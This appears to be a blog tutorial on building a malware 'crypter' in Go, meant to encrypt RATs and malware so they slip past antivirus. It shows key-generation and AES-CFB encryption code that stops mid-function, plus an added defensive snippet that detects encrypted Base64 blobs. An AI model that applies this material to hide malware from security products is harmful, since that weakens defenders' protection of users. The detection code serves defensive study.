What is a Crypter?
A crypter is software that can encrypt, obfuscate and manipulate malware or a RAT (Remote Access Tool) to potentially bypass security products such as antivirus software.
Encryption Process
To create a simple crypter, I will use the following process:
- Generate a key with random characters & seed (32 characters hard-coded as of now)
- AES Encrypt #1 — Initialize the state array with the block data using the key
- AES Encrypt #2 — Generate IV (Initialization Vector) using block size + length of shellcode
- AES Encrypt #3 — Run the encryption process using the block and IV
- Base64 encode the results
Decryption Process
- Base64 decode the results
- AES Decrypt #1 — Initialize the state array with the block data using the key
- AES Decrypt #2 — Check if the length of the IV is equal to the block size
- AES Decrypt #3 — Run the decryption process using the block and IV
- Return the decrypted string
I chose the Go programming language to create the crypter.
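A defender's view of the output format described in the steps above, as an added example that is not part of the original post: Base64 over a 16-byte IV followed by AES ciphertext appears in a sample as a long Base64 string that decodes to near-random bytes. The 64-byte minimum, the 5.5 bits/byte threshold, the standard Base64 alphabet and all function names are assumptions chosen for illustration.

```go
package main

import (
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"math"
	"regexp"
)

// Base64 runs long enough to decode to about 64 bytes or more (assumed cut-off).
var b64Run = regexp.MustCompile(`[A-Za-z0-9+/]{86,}={0,2}`)
// entropy returns the Shannon entropy of b in bits per byte.
func entropy(b []byte) (h float64) {
	var counts [256]int
	for _, c := range b {
		counts[c]++
	}
	for _, n := range counts {
		if n > 0 {
			p := float64(n) / float64(len(b))
			h -= p * math.Log2(p)
		}
	}
	return h
}
// SuspectBlobs decodes each long Base64 run and keeps the random-looking ones.
func SuspectBlobs(data string) (hits [][]byte) {
	for _, m := range b64Run.FindAllString(data, -1) {
		raw, err := base64.StdEncoding.DecodeString(m)
		if err == nil && len(raw) >= 64 && entropy(raw) >= 5.5 {
			hits = append(hits, raw)
		}
	}
	return hits
}
// constructedSample is made-up input: one random-looking blob, one Base64 of plain text.
func constructedSample() string {
	var blob []byte
	for seed := sha256.Sum256([]byte("constructed sample")); len(blob) < 256; seed = sha256.Sum256(seed[:]) {
		blob = append(blob, seed[:]...)
	}
	text := []byte("the quick brown fox jumps over the lazy dog, then the lazy dog naps under the old oak tree")
	return `a := "` + base64.StdEncoding.EncodeToString(blob) + `"; b := "` + base64.StdEncoding.EncodeToString(text) + `"`
}
func main() {
	for _, raw := range SuspectBlobs(constructedSample()) {
		fmt.Printf("%d bytes, %.2f bits/byte, leading block (IV position) %x\n", len(raw), entropy(raw), raw[:16])
	}
}
```

High entropy alone also matches compressed or otherwise encoded data, so a hit is a lead for manual review rather than a verdict.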
Generate Key Code
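// Random Key Generator (128 bit)
// Uses math/rand, imported under the alias mrand so it does not clash
// with crypto/rand (rand.Reader) used in Encrypt.
var chars = []rune("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")

func randKeyGen(n int) string {
	charSet := make([]rune, n)
	for i := range charSet {
		// Pick one character from the set for each position of the key
		charSet[i] = chars[mrand.Intn(len(chars))]
	}
	return string(charSet)
}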
Encryption Code
// Encrypt: Original Text --> Add IV --> Encrypt with Key --> Base64 Encode
// Uses crypto/aes, crypto/cipher, crypto/rand (rand.Reader) and io.
func Encrypt(key []byte, text []byte) string {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}

	// Creating IV
	ciphertext := make([]byte, aes.BlockSize+len(text))
	iv := ciphertext[:aes.BlockSize]
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		panic(err)
	}

	// Encryption Process
	stream := cipher.NewCFBEncrypter(block, iv)
	stream.XORKeyStream(ciphertext[aes.BlockSize:], text)